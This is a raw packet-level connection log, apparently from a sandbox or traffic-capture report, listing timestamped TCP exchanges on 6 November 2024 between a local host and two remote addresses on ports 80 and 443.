                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407104015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407107115 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407121897 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407133102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407143116 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407145977 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407155991 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407166958 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407174110 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407177925 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407186985 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407191038 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407195091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407200098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407212019 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407222986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407223940 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407236099 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407253027 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407253981 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407262087 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407265902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407275915 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407294035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407310009 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407310963 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407334089 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407335997 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407346964 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407358885 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407371998 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407377005 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407385111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407392025 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407414913 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407609940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407623053 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407634020 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407644987 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407654047 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407655954 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407670021 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407681942 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407685041 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407702923 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407982111 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.407995939 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408011913 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408021927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408025026 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408034086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408047915 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408056974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408068895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408072948 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408109903 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408132076 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408143044 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408153057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408170938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408175945 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408184052 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408195972 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408204079 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.408226967 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409748077 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409764051 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409775972 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409786940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409802914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409804106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409816027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409822941 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409828901 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409846067 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409852982 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409859896 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409872055 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409883976 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409887075 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409899950 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409899950 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409914017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409926891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409938097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409950972 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409951925 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409964085 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409975052 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409976006 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409985065 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.409989119 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410000086 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410008907 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410011053 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410022974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410034895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410037994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410048962 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410052061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410093069 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410832882 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410844088 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410855055 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410866976 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410876989 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410878897 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410893917 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410908937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410912991 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410938025 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.410996914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411009073 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411022902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411034107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411041021 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411045074 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411057949 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411065102 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411068916 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411079884 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411081076 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411096096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411108017 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411118984 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411142111 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411142111 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411171913 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411190033 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411201954 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411212921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411225080 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411236048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411240101 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411247969 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411259890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411268950 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411276102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411281109 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411288023 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411303997 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411319971 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411326885 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.411348104 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450196981 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450275898 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450283051 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450294018 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450356960 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450356960 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450490952 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450508118 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450517893 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.450524092 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.465652943 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.503629923 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.503671885 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.503751040 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.504476070 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.504511118 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.504559040 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.505971909 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506005049 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506057024 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506467104 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506506920 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506572008 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506704092 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506714106 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506795883 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506809950 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506895065 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506930113 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506941080 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506944895 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.506990910 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.507116079 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.507127047 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.507145882 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.507153988 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.690851927 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.690901995 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.134799957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.135905027 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.235820055 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.236304045 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.236478090 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.236496925 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.236870050 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.236892939 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.237210989 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.237221003 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.237364054 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.237370014 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.240250111 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.240622044 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.240658045 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.240813971 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.240989923 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.240994930 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.241178036 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.241189957 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.241501093 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.241511106 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.247558117 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.248714924 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.248733997 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.249164104 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.249167919 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364145994 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364167929 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364216089 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364233971 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364312887 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364749908 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364749908 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364774942 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.364784956 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.366643906 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.366676092 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.366770029 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.366787910 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.366946936 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.366998911 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.367592096 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.367608070 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.367634058 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.367640018 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.369853973 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.369910002 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.370141029 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.370599985 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.370647907 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.370832920 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.370840073 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.370879889 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.370893002 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371195078 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371217966 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371232033 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371279955 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371442080 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371442080 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371450901 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.371459007 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.373572111 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.373580933 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.373783112 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.373871088 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.373881102 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.378827095 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.378849030 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.378899097 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.378904104 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.378942966 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.379266977 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.379278898 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.379287958 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.379296064 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.381407022 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.381423950 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.381654978 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.381777048 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.381788015 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.384046078 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.384210110 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.384660959 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.384682894 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.384692907 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.384702921 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.384706974 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.386869907 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.386879921 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.386946917 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.387084007 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.387094021 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.408879995 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416486025 CET8049719185.215.113.16192.168.2.5
